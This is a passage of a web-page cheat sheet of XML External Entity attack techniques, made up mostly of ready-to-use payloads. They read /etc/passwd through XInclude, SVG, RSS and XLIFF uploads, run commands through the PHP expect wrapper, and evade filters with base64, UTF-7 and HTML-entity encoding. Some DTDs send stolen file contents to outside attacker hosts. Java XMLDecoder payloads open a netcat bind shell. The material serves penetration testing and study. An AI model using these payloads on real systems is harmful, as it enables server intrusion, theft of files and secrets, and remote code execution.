</code></pre></div></div> <p>Then you can try to crack the hash using hashcat</p> <h2 id="hidden-xxe-surfaces">Hidden XXE Surfaces</h2> <h3 id="xinclude">XInclude</h3> <p>When integrating client data into server-side XML documents, like those in backend SOAP requests, direct control over the XML structure is often limited, hindering traditional XXE attacks due to restrictions on modifying the <code class="language-plaintext highlighter-rouge">DOCTYPE</code> element. However, an <code class="language-plaintext highlighter-rouge">XInclude</code> attack provides a solution by allowing the insertion of external entities within any data element of the XML document. This method is effective even when only a portion of the data within a server-generated XML document can be controlled.</p> <p>To execute an <code class="language-plaintext highlighter-rouge">XInclude</code> attack, the <code class="language-plaintext highlighter-rouge">XInclude</code> namespace must be declared, and the file path for the intended external entity must be specified. Below is a succinct example of how such an attack can be formulated:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>productId=<span class="nt">&lt;foo</span> <span class="na">xmlns:xi=</span><span class="s">"http://www.w3.org/2001/XInclude"</span><span class="nt">&gt;&lt;xi:include</span> <span class="na">parse=</span><span class="s">"text"</span> <span class="na">href=</span><span class="s">"file:///etc/passwd"</span><span class="nt">/&gt;&lt;/foo&gt;</span><span class="err">&amp;</span>storeId=1
</code></pre></div></div> <p>Check <a href="https://portswigger.net/web-security/xxe">https://portswigger.net/web-security/xxe</a> for more info!</p> <h3 id="svg---file-upload">SVG - File Upload</h3> <p>Files uploaded by users to certain applications, which are then processed on the server, can exploit vulnerabilities in how XML or XML-containing file formats are handled. Common file formats like office documents (DOCX) and images (SVG) are based on XML.</p> <p>When users <strong>upload images</strong>, these images are processed or validated server-side. Even for applications expecting formats such as PNG or JPEG, the <strong>server’s image processing library might also support SVG images</strong>. SVG, being an XML-based format, can be exploited by attackers to submit malicious SVG images, thereby exposing the server to XXE (XML External Entity) vulnerabilities.</p> <p>An example of such an exploit is shown below, where a malicious SVG image attempts to read system files:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;svg</span> <span class="na">xmlns=</span><span class="s">"http://www.w3.org/2000/svg"</span> <span class="na">xmlns:xlink=</span><span class="s">"http://www.w3.org/1999/xlink"</span> <span class="na">width=</span><span class="s">"300"</span> <span class="na">version=</span><span class="s">"1.1"</span> <span class="na">height=</span><span class="s">"200"</span><span class="nt">&gt;&lt;image</span> <span class="na">xlink:href=</span><span class="s">"file:///etc/hostname"</span><span class="nt">&gt;&lt;/image&gt;&lt;/svg&gt;</span>
</code></pre></div></div> <p>Another method involves attempting to <strong>execute commands</strong> through the PHP “expect” wrapper:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;svg</span> <span class="na">xmlns=</span><span class="s">"http://www.w3.org/2000/svg"</span> <span class="na">xmlns:xlink=</span><span class="s">"http://www.w3.org/1999/xlink"</span> <span class="na">width=</span><span class="s">"300"</span> <span class="na">version=</span><span class="s">"1.1"</span> <span class="na">height=</span><span class="s">"200"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;image</span> <span class="na">xlink:href=</span><span class="s">"expect://ls"</span><span class="nt">&gt;&lt;/image&gt;</span>
<span class="nt">&lt;/svg&gt;</span>
</code></pre></div></div> <p>In both instances, the SVG format is used to launch attacks that exploit the XML processing capabilities of the server’s software, highlighting the need for robust input validation and security measures.</p> <p>Check <a href="https://portswigger.net/web-security/xxe">https://portswigger.net/web-security/xxe</a> for more info!</p> <p><strong>Note the first line of the read file or of the result of the execution will appear INSIDE the created image. So you need to be able to access the image SVG has created.</strong></p> <h3 id="pdf---file-upload"><strong>PDF - File upload</strong></h3> <p>Read the following post to <strong>learn how to exploit a XXE uploading a PDF</strong> file:</p> <p>file-upload/pdf-upload-xxe-and-cors-bypass.md</p> <h3 id="content-type-from-x-www-urlencoded-to-xml">Content-Type: From x-www-urlencoded to XML</h3> <p>If a POST request accepts the data in XML format, you could try to exploit a XXE in that request. For example, if a normal request contains the following:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar
</code></pre></div></div> <p>Then you might be able submit the following request, with the same result:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span><span class="nt">&lt;foo&gt;</span>bar<span class="nt">&lt;/foo&gt;</span>
</code></pre></div></div> <h3 id="content-type-from-json-to-xee">Content-Type: From JSON to XEE</h3> <p>To change the request you could use a Burp Extension named “<strong>Content Type Converter</strong>“. <a href="https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html">Here</a> you can find this example:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Content-Type: application/json;charset=UTF-8

{"root": {"root": {
  "firstName": "Avinash",
  "lastName": "",
  "country": "United States",
  "city": "ddd",
  "postalCode": "ddd"
}}}
</code></pre></div></div> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Content-Type: application/xml;charset=UTF-8

<span class="cp">&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;</span>
<span class="cp">&lt;!DOCTYPE testingxxe [&lt;!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" &gt;</span>]&gt;
<span class="nt">&lt;root&gt;</span>
 <span class="nt">&lt;root&gt;</span>
  <span class="nt">&lt;firstName&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/firstName&gt;</span>
  <span class="nt">&lt;lastName/&gt;</span>
  <span class="nt">&lt;country&gt;</span>United States<span class="nt">&lt;/country&gt;</span>
  <span class="nt">&lt;city&gt;</span>ddd<span class="nt">&lt;/city&gt;</span>
  <span class="nt">&lt;postalCode&gt;</span>ddd<span class="nt">&lt;/postalCode&gt;</span>
 <span class="nt">&lt;/root&gt;</span>
<span class="nt">&lt;/root&gt;</span>
</code></pre></div></div> <p>Another example can be found <a href="https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2">here</a>.</p> <h2 id="waf--protections-bypasses">WAF &amp; Protections Bypasses</h2> <h3 id="base64">Base64</h3> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE test [ &lt;!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"&gt;</span> %init; ]&gt;<span class="nt">&lt;foo/&gt;</span>
</code></pre></div></div> <p>This only work if the XML server accepts the <code class="language-plaintext highlighter-rouge">data://</code> protocol.</p> <h3 id="utf-7">UTF-7</h3> <p>You can use the [<strong>“Encode Recipe</strong>” of cyberchef here ]([<a href="https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7">https://gchq.github.io/CyberChef/index.html#recipe=Encode_text%28’UTF-7</a> %2865000%29’%29\&amp;input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to](<a href="https://gchq.github.io/CyberChef/#recipe=Encode_text%28%27UTF-7%20%2865000%29%27%29&amp;input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to">https://gchq.github.io/CyberChef/index.html#recipe=Encode_text%28’UTF-7 %2865000%29’%29\&amp;input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to</a>) transform to UTF-7.</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!xml version="1.0" encoding="UTF-7"?--&gt;</span>
+ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
</code></pre></div></div> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-7"?&gt;</span>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
</code></pre></div></div> <h3 id="file-protocol-bypass">File:/ Protocol Bypass</h3> <p>If the web is using PHP, instead of using <code class="language-plaintext highlighter-rouge">file:/</code> you can use <strong>php wrappers</strong><code class="language-plaintext highlighter-rouge">php://filter/convert.base64-encode/resource=</code> to <strong>access internal files</strong>.</p> <p>If the web is using Java you may check the <a href="xxe-xee-xml-external-entity.md#jar-protocol"><strong>jar: protocol</strong></a>.</p> <h3 id="html-entities">HTML Entities</h3> <p>Trick from <a href="https://github.com/Ambrotd/XXE-Notes"><strong>https://github.com/Ambrotd/XXE-Notes</strong></a><br/> You can create an <strong>entity inside an entity</strong> encoding it with <strong>html entities</strong> and then call it to <strong>load a dtd</strong>.<br/> Note that the <strong>HTML Entities</strong> used needs to be <strong>numeric</strong> (like [in this example](<a href="https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&amp;input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C">https://gchq.github.io/CyberChef/index.html#recipe=To_HTML_Entity%28true,’Numeric entities’%29\&amp;input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\</a>).</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE foo [&lt;!ENTITY % a "&lt;&amp;#x21;&amp;#x45;&amp;#x4E;&amp;#x54;&amp;#x49;&amp;#x54;&amp;#x59;&amp;#x25;&amp;#x64;&amp;#x74;&amp;#x64;&amp;#x53;&amp;#x59;&amp;#x53;&amp;#x54;&amp;#x45;&amp;#x4D;&amp;#x22;&amp;#x68;&amp;#x74;&amp;#x74;&amp;#x70;&amp;#x3A;&amp;#x2F;&amp;#x2F;&amp;#x6F;&amp;#x75;&amp;#x72;&amp;#x73;&amp;#x65;&amp;#x72;&amp;#x76;&amp;#x65;&amp;#x72;&amp;#x2E;&amp;#x63;&amp;#x6F;&amp;#x6D;&amp;#x2F;&amp;#x62;&amp;#x79;&amp;#x70;&amp;#x61;&amp;#x73;&amp;#x73;&amp;#x2E;&amp;#x64;&amp;#x74;&amp;#x64;&amp;#x22;&amp;#x3E;" &gt;</span>%a;%dtd;]&gt;
<span class="nt">&lt;data&gt;</span>
    <span class="nt">&lt;env&gt;</span><span class="ni">&amp;exfil;</span><span class="nt">&lt;/env&gt;</span>
<span class="nt">&lt;/data&gt;</span>
</code></pre></div></div> <p>DTD example:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag"&gt;</span>
<span class="cp">&lt;!ENTITY % abt "&lt;!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'&gt;</span>"&gt;
%abt;
%exfil;
</code></pre></div></div> <h2 id="php-wrappers">PHP Wrappers</h2> <h3 id="base64-1">Base64</h3> <p><strong>Extract</strong> <em><strong>index.php</strong></em></p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE replace [&lt;!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"&gt;</span> ]&gt;
</code></pre></div></div> <h4 id="extract-external-resource"><strong>Extract external resource</strong></h4> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE replace [&lt;!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3"&gt;</span> ]&gt;
</code></pre></div></div> <h3 id="remote-code-execution">Remote code execution</h3> <p><strong>If PHP “expect” module is loaded</strong></p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;</span>
<span class="cp">&lt;!ENTITY xxe SYSTEM "expect://id" &gt;</span>]&gt;
<span class="nt">&lt;creds&gt;</span>
    <span class="nt">&lt;user&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/user&gt;</span>
    <span class="nt">&lt;pass&gt;</span>mypass<span class="nt">&lt;/pass&gt;</span>
<span class="nt">&lt;/creds&gt;</span>
</code></pre></div></div> <h2 id="soap---xee"><strong>SOAP - XEE</strong></h2> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;soap:Body&gt;&lt;foo&gt;</span><span class="cp">&lt;![CDATA[&lt;!DOCTYPE doc [&lt;!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"&gt; %dtd;]&gt;&lt;xxx/&gt;]]&gt;</span><span class="nt">&lt;/foo&gt;&lt;/soap:Body&gt;</span>
</code></pre></div></div> <h2 id="xliff---xxe">XLIFF - XXE</h2> <p>This example is inspired in <a href="https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe">https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe</a></p> <p>XLIFF (XML Localization Interchange File Format) is utilized to standardize data exchange in localization processes. It’s an XML-based format primarily used for transferring localizable data among tools during localization and as a common exchange format for CAT (Computer-Aided Translation) tools.</p> <h3 id="blind-request-analysis">Blind Request Analysis</h3> <p>A request is made to the server with the following content:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml

<span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE XXE [
&lt;!ENTITY % remote SYSTEM "http://redacted.burpcollaborator.net/?xxe_test"&gt;</span> %remote; ]&gt;
<span class="nt">&lt;xliff</span> <span class="na">srcLang=</span><span class="s">"en"</span> <span class="na">trgLang=</span><span class="s">"ms-MY"</span> <span class="na">version=</span><span class="s">"2.0"</span><span class="nt">&gt;&lt;/xliff&gt;</span>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
</code></pre></div></div> <p>However, this request triggers an internal server error, specifically mentioning a problem with the markup declarations:</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="mi">500</span><span class="p">,</span><span class="w">
  </span><span class="nl">"error"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Internal Server Error"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"message"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div> <p>Despite the error, a hit is recorded on Burp Collaborator, indicating some level of interaction with the external entity.</p> <p>Out of Band Data Exfiltration To exfiltrate data, a modified request is sent:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml

&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE XXE [
&lt;!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"&gt; %remote; ]&gt;
&lt;xliff srcLang="en" trgLang="ms-MY" version="2.0"&gt;&lt;/xliff&gt;
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
</code></pre></div></div> <p>This approach reveals that the User Agent indicates the use of Java 1.8. A noted limitation with this version of Java is the inability to retrieve files containing a newline character, such as /etc/passwd, using the Out of Band technique.</p> <p>Error-Based Data Exfiltration To overcome this limitation, an Error-Based approach is employed. The DTD file is structured as follows to trigger an error that includes data from a target file:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!ENTITY % data SYSTEM "file:///etc/passwd"&gt;</span>
<span class="cp">&lt;!ENTITY % foo "&lt;!ENTITY &amp;#37; xxe SYSTEM 'file:///nofile/'&gt;</span>"&gt;
%foo;
%xxe;
</code></pre></div></div> <p>The server responds with an error, importantly reflecting the non-existent file, indicating that the server is attempting to access the specified file:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="dl">"</span><span class="s2">status</span><span class="dl">"</span><span class="p">:</span><span class="mi">500</span><span class="p">,</span><span class="dl">"</span><span class="s2">error</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">Internal Server Error</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">message</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="s2">IO error.</span><span class="se">\n</span><span class="s2">Reason: /nofile (No such file or directory)</span><span class="dl">"</span><span class="p">}</span>
</code></pre></div></div> <p>To include the file’s content in the error message, the DTD file is adjusted:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!ENTITY % data SYSTEM "file:///etc/passwd"&gt;</span>
<span class="cp">&lt;!ENTITY % foo "&lt;!ENTITY &amp;#37; xxe SYSTEM 'file:///nofile/%data;'&gt;</span>"&gt;
%foo;
%xxe;
</code></pre></div></div> <p>This modification leads to the successful exfiltration of the file’s content, as it is reflected in the error output sent via HTTP. This indicates a successful XXE (XML External Entity) attack, leveraging both Out of Band and Error-Based techniques to extract sensitive information.</p> <h2 id="rss---xee">RSS - XEE</h2> <p>Valid XML with RSS format to exploit an XXE vulnerability.</p> <h3 id="ping-back">Ping back</h3> <p>Simple HTTP request to attackers server</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE title [ &lt;!ELEMENT title ANY &gt;</span>
<span class="cp">&lt;!ENTITY xxe SYSTEM "http://&lt;AttackIP&gt;</span>/rssXXE" &gt;]&gt;
<span class="nt">&lt;rss</span> <span class="na">version=</span><span class="s">"2.0"</span> <span class="na">xmlns:atom=</span><span class="s">"http://www.w3.org/2005/Atom"</span><span class="nt">&gt;</span>
<span class="nt">&lt;channel&gt;</span>
<span class="nt">&lt;title&gt;</span>XXE Test Blog<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;link&gt;</span>http://example.com/<span class="nt">&lt;/link&gt;</span>
<span class="nt">&lt;description&gt;</span>XXE Test Blog<span class="nt">&lt;/description&gt;</span>
<span class="nt">&lt;lastBuildDate&gt;</span>Mon, 02 Feb 2015 00:00:00 -0000<span class="nt">&lt;/lastBuildDate&gt;</span>
<span class="nt">&lt;item&gt;</span>
<span class="nt">&lt;title&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;link&gt;</span>http://example.com<span class="nt">&lt;/link&gt;</span>
<span class="nt">&lt;description&gt;</span>Test Post<span class="nt">&lt;/description&gt;</span>
<span class="nt">&lt;author&gt;</span>author@example.com<span class="nt">&lt;/author&gt;</span>
<span class="nt">&lt;pubDate&gt;</span>Mon, 02 Feb 2015 00:00:00 -0000<span class="nt">&lt;/pubDate&gt;</span>
<span class="nt">&lt;/item&gt;</span>
<span class="nt">&lt;/channel&gt;</span>
<span class="nt">&lt;/rss&gt;</span>
</code></pre></div></div> <h3 id="read-file-1">Read file</h3> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE title [ &lt;!ELEMENT title ANY &gt;</span>
<span class="cp">&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;</span>]&gt;
<span class="nt">&lt;rss</span> <span class="na">version=</span><span class="s">"2.0"</span> <span class="na">xmlns:atom=</span><span class="s">"http://www.w3.org/2005/Atom"</span><span class="nt">&gt;</span>
<span class="nt">&lt;channel&gt;</span>
<span class="nt">&lt;title&gt;</span>The Blog<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;link&gt;</span>http://example.com/<span class="nt">&lt;/link&gt;</span>
<span class="nt">&lt;description&gt;</span>A blog about things<span class="nt">&lt;/description&gt;</span>
<span class="nt">&lt;lastBuildDate&gt;</span>Mon, 03 Feb 2014 00:00:00 -0000<span class="nt">&lt;/lastBuildDate&gt;</span>
<span class="nt">&lt;item&gt;</span>
<span class="nt">&lt;title&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;link&gt;</span>http://example.com<span class="nt">&lt;/link&gt;</span>
<span class="nt">&lt;description&gt;</span>a post<span class="nt">&lt;/description&gt;</span>
<span class="nt">&lt;author&gt;</span>author@example.com<span class="nt">&lt;/author&gt;</span>
<span class="nt">&lt;pubDate&gt;</span>Mon, 03 Feb 2014 00:00:00 -0000<span class="nt">&lt;/pubDate&gt;</span>
<span class="nt">&lt;/item&gt;</span>
<span class="nt">&lt;/channel&gt;</span>
<span class="nt">&lt;/rss&gt;</span>
</code></pre></div></div> <h3 id="read-source-code">Read source code</h3> <p>Using PHP base64 filter</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE title [ &lt;!ELEMENT title ANY &gt;</span>
<span class="cp">&lt;!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" &gt;</span>]&gt;
<span class="nt">&lt;rss</span> <span class="na">version=</span><span class="s">"2.0"</span> <span class="na">xmlns:atom=</span><span class="s">"http://www.w3.org/2005/Atom"</span><span class="nt">&gt;</span>
<span class="nt">&lt;channel&gt;</span>
<span class="nt">&lt;title&gt;</span>The Blog<span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;link&gt;</span>http://example.com/<span class="nt">&lt;/link&gt;</span>
<span class="nt">&lt;description&gt;</span>A blog about things<span class="nt">&lt;/description&gt;</span>
<span class="nt">&lt;lastBuildDate&gt;</span>Mon, 03 Feb 2014 00:00:00 -0000<span class="nt">&lt;/lastBuildDate&gt;</span>
<span class="nt">&lt;item&gt;</span>
<span class="nt">&lt;title&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/title&gt;</span>
<span class="nt">&lt;link&gt;</span>http://example.com<span class="nt">&lt;/link&gt;</span>
<span class="nt">&lt;description&gt;</span>a post<span class="nt">&lt;/description&gt;</span>
<span class="nt">&lt;author&gt;</span>author@example.com<span class="nt">&lt;/author&gt;</span>
<span class="nt">&lt;pubDate&gt;</span>Mon, 03 Feb 2014 00:00:00 -0000<span class="nt">&lt;/pubDate&gt;</span>
<span class="nt">&lt;/item&gt;</span>
<span class="nt">&lt;/channel&gt;</span>
<span class="nt">&lt;/rss&gt;</span>
</code></pre></div></div> <h2 id="java-xmldecoder-xee-to-rce">Java XMLDecoder XEE to RCE</h2> <p>XMLDecoder is a Java class that creates objects based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method <strong>readObject</strong>, he will instantly gain code execution on the server.</p> <h3 id="using-runtimeexec">Using Runtime().exec()</h3> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="nt">&lt;java</span> <span class="na">version=</span><span class="s">"1.7.0_21"</span> <span class="na">class=</span><span class="s">"java.beans.XMLDecoder"</span><span class="nt">&gt;</span>
 <span class="nt">&lt;object</span> <span class="na">class=</span><span class="s">"java.lang.Runtime"</span> <span class="na">method=</span><span class="s">"getRuntime"</span><span class="nt">&gt;</span>
      <span class="nt">&lt;void</span> <span class="na">method=</span><span class="s">"exec"</span><span class="nt">&gt;</span>
      <span class="nt">&lt;array</span> <span class="na">class=</span><span class="s">"java.lang.String"</span> <span class="na">length=</span><span class="s">"6"</span><span class="nt">&gt;</span>
          <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"0"</span><span class="nt">&gt;</span>
              <span class="nt">&lt;string&gt;</span>/usr/bin/nc<span class="nt">&lt;/string&gt;</span>
          <span class="nt">&lt;/void&gt;</span>
          <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"1"</span><span class="nt">&gt;</span>
              <span class="nt">&lt;string&gt;</span>-l<span class="nt">&lt;/string&gt;</span>
          <span class="nt">&lt;/void&gt;</span>
          <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"2"</span><span class="nt">&gt;</span>
              <span class="nt">&lt;string&gt;</span>-p<span class="nt">&lt;/string&gt;</span>
          <span class="nt">&lt;/void&gt;</span>
          <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"3"</span><span class="nt">&gt;</span>
              <span class="nt">&lt;string&gt;</span>9999<span class="nt">&lt;/string&gt;</span>
          <span class="nt">&lt;/void&gt;</span>
          <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"4"</span><span class="nt">&gt;</span>
              <span class="nt">&lt;string&gt;</span>-e<span class="nt">&lt;/string&gt;</span>
          <span class="nt">&lt;/void&gt;</span>
          <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"5"</span><span class="nt">&gt;</span>
              <span class="nt">&lt;string&gt;</span>/bin/sh<span class="nt">&lt;/string&gt;</span>
          <span class="nt">&lt;/void&gt;</span>
      <span class="nt">&lt;/array&gt;</span>
      <span class="nt">&lt;/void&gt;</span>
 <span class="nt">&lt;/object&gt;</span>
<span class="nt">&lt;/java&gt;</span>
</code></pre></div></div> <h3 id="processbuilder">ProcessBuilder</h3> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="nt">&lt;java</span> <span class="na">version=</span><span class="s">"1.7.0_21"</span> <span class="na">class=</span><span class="s">"java.beans.XMLDecoder"</span><span class="nt">&gt;</span>
  <span class="nt">&lt;void</span> <span class="na">class=</span><span class="s">"java.lang.ProcessBuilder"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;array</span> <span class="na">class=</span><span class="s">"java.lang.String"</span> <span class="na">length=</span><span class="s">"6"</span><span class="nt">&gt;</span>
      <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"0"</span><span class="nt">&gt;</span>
        <span class="nt">&lt;string&gt;</span>/usr/bin/nc<span class="nt">&lt;/string&gt;</span>
      <span class="nt">&lt;/void&gt;</span>
      <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"1"</span><span class="nt">&gt;</span>
         <span class="nt">&lt;string&gt;</span>-l<span class="nt">&lt;/string&gt;</span>
      <span class="nt">&lt;/void&gt;</span>
      <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"2"</span><span class="nt">&gt;</span>
         <span class="nt">&lt;string&gt;</span>-p<span class="nt">&lt;/string&gt;</span>
      <span class="nt">&lt;/void&gt;</span>
      <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"3"</span><span class="nt">&gt;</span>
         <span class="nt">&lt;string&gt;</span>9999<span class="nt">&lt;/string&gt;</span>
      <span class="nt">&lt;/void&gt;</span>
      <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"4"</span><span class="nt">&gt;</span>
         <span class="nt">&lt;string&gt;</span>-e<span class="nt">&lt;/string&gt;</span>
      <span class="nt">&lt;/void&gt;</span>
      <span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">"5"</span><span class="nt">&gt;</span>
         <span class="nt">&lt;string&gt;</span>/bin/sh<span class="nt">&lt;/string&gt;</span>
      <span class="nt">&lt;/void&gt;</span>
    <span class="nt">&lt;/array&gt;</span>
    <span class="nt">&lt;void</span> <span class="na">method=</span><span class="s">"start"</span> <span class="na">id=</span><span class="s">"process"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;/void&gt;</span>
  <span class="nt">&lt;/void&gt;</span>
<span class="nt">&lt;/java&gt;</span>
